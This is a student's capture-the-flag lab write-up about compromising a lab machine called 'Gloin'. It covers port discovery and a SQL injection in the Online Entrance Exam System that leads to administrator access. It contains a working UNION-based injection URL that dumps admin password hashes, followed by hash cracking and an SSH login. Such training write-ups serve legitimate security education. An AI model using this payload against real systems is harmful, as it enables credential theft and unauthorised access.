# Lab 9.1: Exploit Gloin

**Deliverable 1.  Provide the Following Information to include commands and screenshots.  Create a tech journal page that covers the following.**

* **Target IP Address**

<figure><img src="https://lh5.googleusercontent.com/cnfcKow3FMgfMwraUfGEVsxqWV8cw601RKNWtu32qGGz94Z0YbWx1ZGoioP5oCD1iKnP2aKz0Tc3I5yKkdpaWDujxGHg3pwK2DsMVEfgAXa1CW8ylr4J6Kf71vDuDD4IGxO1n-n5KECNlD5CdpQgAOI" alt=""><figcaption></figcaption></figure>

```
10.0.5.31
```

* **Open Ports**

<figure><img src="https://lh3.googleusercontent.com/6llAK67TrlElA3v5OkBWqJXvR-jCfwr3GOfnNVSdCMUx4bp-mXJ66irzGrWQbebn4BYX34r3e0HWGnnh0tP_Om5_EswSB6pQo46CdFRM7L-emVmvzva-mJZq1qu1VPayB6BjF07iUambhiZBhb6mImc" alt=""><figcaption></figcaption></figure>

```
22
443
3389
```

* **Discovered Vulnerability**

<figure><img src="https://lh4.googleusercontent.com/1tzg0fBiFQo7QEZ6yDtLJx1U7UFUuqpOR37I01nlEYBjxW6Cb3XogPOr3_TURKjFQAW_WLgMpLYYbI1_m3jC2zgoGcGkBBS3q0IfuTAeWtvU3XMERWjGJX2tZJudvNtRJWTbkVNwyvr9jbj2e3PpuZc" alt=""><figcaption></figcaption></figure>

Found that Online Entrance Exam System has an sql vulnerability

<figure><img src="https://lh6.googleusercontent.com/wUcxIl12Ivy5aXeLmIWL76EH8sCzvOiu9j4WPEiRhAi-rjhdq8NjYXjGaZElLLlQrjI3GE3orUNd6wERXggmIS4IW5bVAUggN0DTXaL-ZWfq-N9Kp3z_f5-stc0r9_2OvZtAkJZ3OfmZqbN8B3PLZLQ" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
https://10.0.5.31/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list;

```

{% endcode %}

Line above will dump admin hash

<figure><img src="https://lh3.googleusercontent.com/NZrhlGjR8kwia0NF_f6KfdUvpXl3fHljoo_MinICMuiIHVni2vW3JVrtDYmKf0US7A1srpOZctjOOrIgQneUxEFYFJP_uDT1pC_6v9nWs5x3fnrjo9Y7RWTyZlHSmP9UAqZwivjU6mo6JTImy22-tCM" alt=""><figcaption></figcaption></figure>

Peer told me to use CrackStation for this step

<figure><img src="https://lh3.googleusercontent.com/l-AvNhWFWvbiyChcyrdMlIcsOAmmQHOkDRtE9nqgDOZHlYOwrOzs-4SqYh9kHPgK9A2THkdPxAC0RMIPxT986A-p1_oqzzFjg3D2EG9vcnG3eYva_L0i4pKSAKMKvYL026TOiWElw6b9mE5zNKLE9es" alt=""><figcaption></figcaption></figure>

* **How you achieved a foothold**

I found the exploit for Online Entrance Exam System by using searchsploit and finding a mysql exploit then looking at exploit db and reading what was there.

<figure><img src="https://3672032160-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F3Qsmtw2a8kQMt8K7P5qR%2Fuploads%2FW7Jm7Ugv8rj5Afc7Gvmo%2Fimage.png?alt=media&#x26;token=7c575d5f-062c-4ce5-a54f-669b69ba545e" alt=""><figcaption></figcaption></figure>

* **How you achieved root/Administrative level compromise**

I cracked the hash for the admin user and then sshed into the machine using administrator as the user because it’s a windows machine.

* **User Flag**

<figure><img src="https://lh4.googleusercontent.com/yHW8Uhw_6BuX3sc91M0MUMtuNpyuoDwQUdlPESuY31Bi5A4syD92HbzF5v48FEsyZ9MtdQOy-RJ2D1j_fasZgXbiV-OwZK2txUhlM9Fik9zRsWvaX3AN-oscMBGrdZIHoLTVVgVMppZxjWWMCWWALS4" alt=""><figcaption><p>User Flag</p></figcaption></figure>

* **Root Flag**

<figure><img src="https://lh5.googleusercontent.com/GVwxGxgCoViG1I76kR4q_VmMjNioFQl32O-ciki3_3x8PxI3gtyfAc8VyCRdLNZW9NGBMI0W8W81tZ8ksB2jB8H0ExJ6XKORcfm5-emUAtdZy5fvy-B4YAeicPQXrQbgPj39JgyNRdDGmDwe05Ckv7Y" alt=""><figcaption><p>Root Flag</p></figcaption></figure>

### Overview

I didn't have much trouble with this lab I was very thankful for my peer who told me to use CrackStation instead of trying to other tools. It made this process a lot easier. I did find it very fun to not have much information and having to get a foothold on our own.